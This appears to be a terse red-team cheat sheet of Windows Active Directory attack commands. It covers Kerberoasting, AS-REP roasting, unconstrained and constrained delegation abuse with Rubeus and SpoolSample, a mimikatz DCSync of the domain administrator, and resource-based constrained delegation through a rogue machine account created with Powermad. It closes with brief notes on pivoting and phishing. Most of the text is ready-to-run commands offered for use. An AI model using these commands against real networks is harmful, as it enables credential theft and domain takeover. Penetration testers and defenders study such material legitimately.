Domain Reconnaissance on Windows

GPO

Check GPOs which enable group of users to have remote access (PsExec, WMI, WinRM, RDP, etc) to specific hosts.

Kerberoasting

rubeus.exe kerberoast /user:svc_sql /nowrap

ASREPRoasting

rubeus.exe asreproast /format:hashcat /user:svc_sql /nowrap

Unconstrained Delegation

rubeus.exe monitor /interval:1 /filtuser:reddc$ /nowrap

Spoolsample.exe reddc redsqlw

rubeus.exe ptt /ticket:[ticket]

mimikatz # lsadump::dcsync /domain:red.com /user:RED\administrator

Constrained Delegation

rubeus.exe tgtdeleg /nowrap

rubeus.exe s4u /impersonate:kevin /user:svc_sql /domain:red.local /msdsspn:time/redwebaw.red.com /altservice:cifs,host,http,winrm /ticket:[ticket] /dc:reddc.red.com /ptt

Resource Based Constrained Delegation

ipmo .\powermad.ps1

New-MachineAccount -MachineAccount my -Password $(ConvertTo-SecureString '123' -AsPlainText -Force)

ipmo .\Microsoft.ActiveDirectory.Management.dll

Set-ADComputer red09 -PrincipalsAllowedToDelegateToAccount my$ -Server [DC IP] -Verbose

rubeus.exe s4u /user:my$ /rc4:…… /impersonateuser:administrator /msdsspn:CIFS/red09.red.com /ptt

Internal Web Service

If it is not accessible directly, use SOCKS to access it.

Any computer/users' name contain "web", "svc", etc.

Send a phishing email

Send a document

Execute command

Ping a host

DevOps